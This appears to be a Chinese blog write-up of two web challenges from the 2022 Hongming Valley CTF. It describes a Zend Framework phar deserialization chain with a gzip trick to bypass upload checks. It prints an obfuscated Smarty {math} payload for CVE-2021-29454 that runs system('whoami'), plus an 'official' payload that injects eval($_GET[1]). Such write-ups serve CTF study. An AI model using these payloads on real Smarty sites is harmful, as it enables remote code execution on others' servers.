2022红明谷杯web-WriteUp
好久没打比赛了,练练手
Web
Fan website
Zend FrameWork Pop Chain
Zend FrameWork Pop Chain - 先知社区 (aliyun.com)
有源码,发现是上面那条链子,用phar可以触发,有限制大小和检测文件头的部分,用垃圾数据和gzip压缩一下就能绕过
1 |
|
gzip压缩,去掉phar头的特征
直接上传后,获得path,然后在删除相册的地方触发
phar:///var/www/html/img/xxxx.jpg
Smarty_calculator
smarty的模板注入,CVE-2021-29454
Remote Code Execution (RCE) in smarty/smarty | CVE-2021-29454 | Snyk
草,真是cve
math表达式有可以绕过的地方
1 | {math equation="(('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(121).('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(116).('1chr'[1].'1chr'[2].'1chr'[3])(101).('1chr'[1].'1chr'[2].'1chr'[3])(109))(('1chr'[1].'1chr'[2].'1chr'[3])(119).('1chr'[1].'1chr'[2].'1chr'[3])(104).('1chr'[1].'1chr'[2].'1chr'[3])(111).('1chr'[1].'1chr'[2].'1chr'[3])(97).('1chr'[1].'1chr'[2].'1chr'[3])(109).('1chr'[1].'1chr'[2].'1chr'[3])(105))" chr=1} |
后期没再看,没环境了,本地能打通,线上环境有disable_function,应该绕过就行
官方payload
1 | data=%7Bfunction%20name%3D'exp()%7B%7D%3Beval(%24_GET%5B1%5D)%3Bfunction%0A%0A'%7D%7B%2Ffunction%7D |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Site-01!